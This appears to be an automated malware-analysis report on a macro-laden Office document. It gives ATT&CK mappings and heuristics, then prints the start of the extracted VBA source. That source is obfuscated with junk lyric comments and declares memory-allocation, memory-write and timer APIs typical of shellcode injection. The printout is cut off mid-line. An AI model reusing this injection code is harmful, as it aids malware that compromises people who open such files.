Verdict: MALICIOUS
Risk Score: 122
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1140 Deobfuscate/Decode Files or Information
The file is an Office document containing VBA macros, including a Document_Open macro, a common technique for automatic malware execution when the document is opened. The presence of a lure instructing the user to enable macros indicates an attempt to bypass Office macro security settings. The VBA code itself is obfuscated, suggesting an intent to hide its malicious functionality, most likely to download and execute a second-stage payload.
Heuristics (5)
- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): the OLE file is 211,458 bytes but its declared streams total only 125,149 bytes; 86,309 bytes (41%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): the document contains VBA macro code.
- Document_Open macro (high, OLE_VBA_DOCOPEN): the document contains a Document_Open macro.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): the document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13266 bytes | ed307cbb7932b097fc2ec7968dcfeefe1f505c7e9a21d271c614fe7bfd2d8e27 |

Preview script: first 1,000 lines of the extracted script (the extracted source is shown as carved, with line breaks restored; the lyric-style comment lines are junk inserted by the obfuscator between the API declarations).

```vb
Attribute VB_Name = "jacks"
' Then you rolled in with your hair in the wind
' Rain was driving, thunder, lightning
#If (8 * 2 + 5) > (7 - 2 * 1) And Win64 > (21 - 7 * 3) * 2 Then
' Driving us to your house
' And hit me like a hurricane
Public Declare PtrSafe Function alate Lib "Kernel32" Alias "CreateTimerQueueTimer" (napaea As Any, ByVal accipere As Any, ByVal antisubmarine As Any, ByVal suffrage As Any, ByVal millersthumb As Any, ByVal holster As Any, ByVal ankle As Any) As Long
' I was doing alright
' We locked eyes over whiskey on ice
' We locked eyes over whiskey on ice
' Driving us to your house
Public Declare PtrSafe Function naboom Lib "Ntdll.dll " Alias "AcquireSRWLockShared" (campagne As Any) As LongPtr
' Driving us to your house
' You wrecked my whole world when you came
' I was doing alright
Public Declare PtrSafe Function filefish Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (afflictive As LongPtr, faute As LongPtr, ByVal unshockable As LongPtr, poundfoolishByVal As LongPtr, earthborn As LongPtr, ByVal boastful As LongPtr) As LongPtr
' The moon went hiding, stars quit shining
' But just your sight had my heart storming
Public Declare PtrSafe Function riesling Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal algorithmic As Any, ByVal distraction As Any, ByVal acrodont As Any, ByVal anglicism As Any, ByVal dynamism As Any) As LongPtr
' Rain was driving, thunder, lightning
' Started talking bout us again
' If I woulda just layed my drink down
' I was doing alright
' But just your sight had my heart storming
' The moon went hiding, stars quit shining
#End If
' But you rolled in with your hair in the wind
' You wrecked my whole world when you came
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
' But you rolled in with your hair in the wind
' I was doing alright
Public Declare Function riesling Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal berried As Any, ByVal astroloma As Any, ByVal decumbency As Any, ByVal insupportable As Any, ByVal dalmatic As Any) As Long
' Baby, without warning
' Baby, without warning
' But you rolled in with your hair in the wind
' Then you rolled in with your hair in the wind
Public Declare Function filefish Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (deterrent As Long, nonoscillatory As Long, ByVal pimple As Long, bryozoanByVal As Long, synchronistical As Long, ByVal nilpotent As Long) As Long
' But just your sight had my heart storming
' I wouldnt be in my truck
' I was doing alright
' We locked eyes over whiskey on ice
' Knew it was gonna be a long night
' Rain was driving, thunder, lightning
' If I woulda just layed my drink down
' We locked eyes over whiskey on ice
Public Declare Function alate Lib "Kernel32" Alias "CreateTimerQueueTimer" (opinionatist As Any, ByVal dehort As Any, ByVal peripherally As Any, ByVal lipstick As Any, ByVal survene As Any, ByVal ashtoreth As Any, ByVal craftiness As Any) As Long
' But just your sight had my heart storming
' And hit me like a hurricane
' Baby, without warning
' Knew it was gonna be a long night
#End If
' Hit me like a hurricane
' But just your sight had my heart storming
Function moving()
Dim pater(255) As Byte
choking = 3 - 100 + 162
Do
pater(choking) = choking - 65
choking = choking + 1
Loop While choking <= 90 + 1
choking = 40 + 8
Do
pater(choking) = choking + 4
choking = choking + 1
Loop While choking <= 50 + 8
choking = 90 + 7
Do
pater(choking) = choking - 71
choking = choking + 1
Loop While choking <= 120 + 3
pater(47) = 60 + 3
choking = 40 + 3
pater(choking) = 60 + 2
moving = pater
End Function
Function denunciation(attainture, abbess, lait)
Select Case lait
Case 33 + (10 / 2 - 5)
denunciation = attainture \ abbess
Case 43 + (5 - 3) / 2 - 1
denunciation = attainture And abbess
Case 51 + (56 / 7 - 4 * 2)
denunciation = attainture * abbess
End Select
End Function
Function bizons(wrd, buls, lky)
#If 2 + (12 * 2) > 14 / 2 And Win64 > (12 - 6 * ... (truncated)
```